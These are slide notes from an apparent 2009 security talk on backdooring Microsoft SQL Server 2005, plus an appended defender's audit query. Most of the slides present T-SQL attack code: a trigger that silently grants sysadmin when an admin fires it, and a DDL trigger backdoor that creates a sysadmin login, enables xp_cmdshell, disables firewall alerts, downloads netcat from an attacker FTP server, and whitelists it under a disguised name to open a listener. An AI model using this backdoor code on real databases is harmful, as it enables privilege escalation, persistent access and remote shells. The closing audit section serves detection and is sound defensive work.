MSSQL SERVER 2005 BACKDOOR
Duong Ngo
October 14, 2009
POST-EXPLOITATION
- Got access to a MSSQL box? (SQL injection, brute force…)
- Privileges: sa / dbo / normal user
- Got all data
- Now what's next??
Backdoors
- Provide easier access to the compromised box in the future
- Types of backdoors: OS backdoors (rootkits), web server backdoors (PHPshell, CGITelnet..)
- So how about a database backdoor?? YES!
SQL Server 2005 Backdoor
- We'll create a backdoor based on a SQL Server trigger.
- What's a trigger?
Database Trigger
- A special kind of stored procedure that executes automatically when a user attempts the specified data-modification statement on the specified table (UPDATE, DELETE, INSERT..)
- A trigger executes under the security context of whoever caused it to fire!
EXAMPLE – Create trigger
Context: Normal user with CREATE TRIGGER permission:
CREATE TRIGGER trg_gain_privilege ON tblCustomers FOR
INSERT, DELETE, UPDATE
AS
EXEC sp_addsrvrolemember @loginame = 'Hacker',
@rolename = N'sysadmin'
EXAMPLE – Trigger got fired
- Context: sa (server admin)
sa> DELETE FROM tblCustomers
- RESULT??
User "Hacker" now becomes sysadmin
What can we do with that?
- Privilege escalation: normal user -> higher role
- Database backdoor
SQLServer Backdoor features:
- Execute subsequent commands if current user is 'sa'
- Enable xp_cmdshell
- Create new login 'backdoor' and add it to sysadmin server role.
- Disable firewall notification mode
- Add ftp to allowed programs list
- Get netcat from attacker ftp server
- Create a directory 'Backdoor_activated' in attacker ftp server to let the attacker know whenever the backdoor has been started.
- Open netcat in listen mode attached with sql command line client Osql.
Our Backdoor’s Code
CREATE TRIGGER trg_backdoor ON DATABASE FOR
DDL_DATABASE_LEVEL_EVENTS
AS
BEGIN
DECLARE @cur_user varchar(200)
……
CREATE LOGIN [backdoor] WITH PASSWORD = 'Backdoor123#' ;
EXEC sys.sp_addsrvrolemember @loginame = N'Backdoor',
@rolename =N'sysadmin'
--disable firewall notification mode
Exec master..xp_cmdshell 'netsh firewall set notifications disable'
…..
Why DDL_DATABASE_LEVEL_EVENTS?
Because it covers all of the events below:
CREATE_TABLE ALTER_TABLE DROP_TABLE CREATE_VIEW
ALTER_VIEW DROP_VIEW
CREATE_SYNONYM DROP_SYNONYM CREATE_FUNCTION
ALTER_FUNCTION DROP_FUNCTION
CREATE_PROCEDURE ALTER_PROCEDURE
DROP_PROCEDURE CREATE_TRIGGER ALTER_TRIGGER
DROP_TRIGGER CREATE_EVENT_NOTIFICATION
DROP_EVENT_NOTIFICATION
….
….
Our Backdoor’s Code (cont)
-- save ftp commands to an external file
SET @cmd = 'echo GET ' + @fileget + ' >> ' + @cmdfile
…..
-- execute ftp with commands loaded from the file we created
SET @cmd = 'ftp -s:' + @cmdfile
EXEC master..xp_cmdshell @cmd, NO_OUTPUT
……
-- After getting netcat, add netcat to the firewall's allowed programs list
SET @cmd = 'netsh firewall add allowedprogram program=' +
@localdir + '\' + @fileget + ' name=Printer mode=ENABLE scope=ALL profile=ALL'
Thank You
for listening!!
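
A defender's audit for the technique in these slides, as an added example that is not part of the original presentation: the T-SQL below lists database-level DDL triggers and any trigger whose body references the calls the slides rely on (sp_addsrvrolemember, xp_cmdshell, CREATE LOGIN), then shows the current sysadmin members and the xp_cmdshell setting. It uses only catalog views present in SQL Server 2005; the search strings are taken from the slides.

```sql
-- Added audit example, not from the original slides.
-- 1) Run in each user database. Flags every database-scoped DDL trigger and
--    any trigger whose text mentions the calls shown in the slides.
--    Triggers created WITH ENCRYPTION have a NULL definition: list those too.
SELECT  t.name                    AS trigger_name,
        t.parent_class_desc       AS scope,         -- DATABASE = DDL trigger
        OBJECT_NAME(t.parent_id)  AS parent_table,  -- NULL for DDL triggers
        t.create_date,
        t.modify_date,
        t.is_disabled,
        m.definition
FROM    sys.triggers AS t
LEFT JOIN sys.sql_modules AS m ON m.object_id = t.object_id
WHERE   t.is_ms_shipped = 0
  AND ( t.parent_class_desc = 'DATABASE'
     OR m.definition IS NULL
     OR UPPER(m.definition) LIKE '%SP_ADDSRVROLEMEMBER%'
     OR UPPER(m.definition) LIKE '%XP_CMDSHELL%'
     OR UPPER(m.definition) LIKE '%CREATE LOGIN%' )
ORDER BY t.modify_date DESC;

-- 2) Events each DDL trigger in this database is bound to.
SELECT  t.name AS trigger_name, e.type_desc AS event_name
FROM    sys.triggers AS t
JOIN    sys.trigger_events AS e ON e.object_id = t.object_id
WHERE   t.parent_class_desc = 'DATABASE';

-- 3) Server level: who holds sysadmin, newest login first.
SELECT  p.name, p.type_desc, p.create_date, p.modify_date
FROM    sys.server_role_members AS rm
JOIN    sys.server_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN    sys.server_principals   AS p ON p.principal_id = rm.member_principal_id
WHERE   r.name = 'sysadmin'
ORDER BY p.create_date DESC;

-- 4) xp_cmdshell is off by default in SQL Server 2005; 1 means it was enabled.
SELECT  name, value_in_use
FROM    sys.configurations
WHERE   name = 'xp_cmdshell';
```

Any row from query 1 that is not a known, change-controlled trigger deserves review, and an unexpected login in query 3 or a value of 1 in query 4 should be traced back to who made the change.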